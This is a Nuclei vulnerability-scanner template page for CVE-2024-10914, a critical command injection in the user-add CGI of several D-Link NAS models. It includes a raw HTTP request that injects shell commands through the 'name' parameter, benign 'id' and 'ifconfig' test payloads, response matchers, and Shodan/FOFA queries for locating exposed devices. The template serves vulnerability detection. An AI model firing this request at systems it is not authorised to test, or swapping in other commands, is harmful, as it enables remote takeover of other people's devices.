D-Link NAS - Command Injection via Name Parameter
ID: CVE-2024-10914
Severity: critical
Author: s4e-io
Tags: cve,cve2024,dlink,sharecenter,rce
Description
Section titled “Description”A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection.
YAML Source
Section titled “YAML Source”id: CVE-2024-10914
info: name: D-Link NAS - Command Injection via Name Parameter author: s4e-io severity: critical description: | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. reference: - https://github.com/verylazytech/CVE-2024-10914 - https://www.usom.gov.tr/bildirim/tr-24-1836 - https://nvd.nist.gov/vuln/detail/CVE-2024-10914 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-10914 cwe-id: CWE-707 epss-score: 0.00092 epss-percentile: 0.40606 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: vendor: dlink product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" tags: cve,cve2024,dlink,sharecenter,rce
http: - raw: - | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1 Host: {{Hostname}}
payloads: command: - "id" - "ifconfig"
stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" - "contains_all(body, 'inet addr:', 'Mask:')" condition: or
- type: dsl dsl: - 'contains(body, "Content-type: text/html")' - "status_code == 200" condition: and# digest: 490a004630440220696726d9ce0c7a227ea8a8a57dfb2f0067ac6e373a15546aec41cf23a68c1a310220578bdc0d44ce11c5cbe96135f8704f38d60d5deb109655c397580e4a4a2c3a5d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-10914.yaml"